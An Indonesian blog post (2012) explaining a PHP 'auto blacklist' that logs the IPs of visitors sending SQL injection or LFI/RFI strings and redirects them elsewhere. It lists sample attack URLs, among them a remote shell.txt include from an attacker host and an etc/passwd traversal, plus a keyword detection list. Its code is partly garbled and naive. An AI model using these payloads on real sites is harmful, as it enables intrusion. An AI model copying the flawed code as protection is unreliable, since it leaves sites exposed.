3

Sabtu, 09 Juni 2012

0 Mengamankan web dengan Auto Blacklist


Untuk mempersingkat waktu dan dari pada banyak bacot sesuai judul diatas kali ini saya akan menjelaskan tehnik mengamankan web menggunakan Auto Blacklist,, dimana,, apabila ada attacker yang mau nyoba-nyoba dengan web kita menggunakan tehnik SQL Injection maupun LFI/RFI maka web akan secara otomatis memasukan IPnya ke daftar blacklist dan secara otomatis mengalihkan attacker ke halaman yang sudah kita tentukan sebelumnya,, heheheheheheee,, Kira-kira begitu,, BonyokBonyok

Ok,, langsung ke topik,, (Maklum,, lagi buru², soalnya cuman sempat numpang warnet teman,,, mumpung gratis,, wkwkwkk) wakakawakaka

Pertama buatlah sebuah tabel pada database kamu, contoh tabel blacklist


PHP Code:
CREATE TABLE `blacklist` (
`
ip_attackervarchar(50NOT NULL

Sekarang kita akan membuat sebuah file yang akan mendeteksi gerak-gerik sang attacker tersebut, dan apabila terdeteksi melakukan sesuatu hal yang dianggap melakukan Pengijeksiaan maka akan otomatis menyalin IP attacker tersebut

file "blacklist.php"

PHP Code:
//Deteksi user yang memasukan sebuah perintah penginjesian terhadap web kitaif(strpos($_SERVER['REQUEST_URI'], "%27") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "http://") || strpos($_SERVER['REQUEST_URI'], "www.") || strpos($_SERVER['REQUEST_URI'], "../") || strpos($_SERVER['REQUEST_URI'], "etc/passwd")) {
//Apabila terdeteksi melakukan penginjeksian, ambil IP mereka$ip $_SERVER['REMOTE_ADDR'];
//Kirim IP ke database kita$kirim_ip mysql_query("INSERT INTO blacklist VALUE ('$ip')");
}
?>

Setelah itu masuk ke file yang kamu rasa dapat di injeksi, saya contohkan file index.php

Contoh Penginjeksian oleh attacker

http://www.web.kamu/index.php?id=1' (SQL Injection)
http://www.web.kamu/index.php?page=http://www.root.attacker/shell.txt (RFI/LFI)
http://www.web.kamu/index.php?page=../../etc/passwd (RFI/LFI)

Untuk penjelasan tehnik diatas mungkin bisa di googling sendiri atau mungkin sudah banyak yang tahu,, karena disini kita akan membahas mengenai Auto Blacklist maka saya juga tidak akan memfokuskan dalam penjelasan tekhnik diatas,, CheerCheer

Oke Next..

Setelah masuk ke file index.php lakukan pengonekan pada file blacklist.php, gunakan fungsi include()

PHP Code:
include "blacklist.php"

Terus jangan lupa lakukan penganalisian IP, untuk mengalihkan attacker ke tempat lain apabila attacker mengakses web kita lagi

PHP Code:
//Periksa IP attacker tersebut apa pernah masuk ke database kita$ipattacker mysql_query("SELECT * FROM blacklist where ip_attacker = '".$_SERVER['REMOTE_ADDR']."'");$konfirmasi_attacker mysql_num_rows($ipattacker);
//Apabila IP telah terdeteksi pernah masuk ke database maka alihkan attacker ke halaman lain, contoh :google.comif ($konfirmasi_attacker !== 0) {header('Location:http://google.com');
}
?>

Mungkin hanya itu dulu dari saya,, semoga sedikit membantu dalam pengamanan web kita dari tangan-tangan jahil,, CulasCulas

Demo :
Code:
http://tolonggalo.web.id/index.php?artikel=13

0 komentar:

Poskan Komentar

You can replace this text by going to "Layout" and then "Page Elements" section. Edit " About "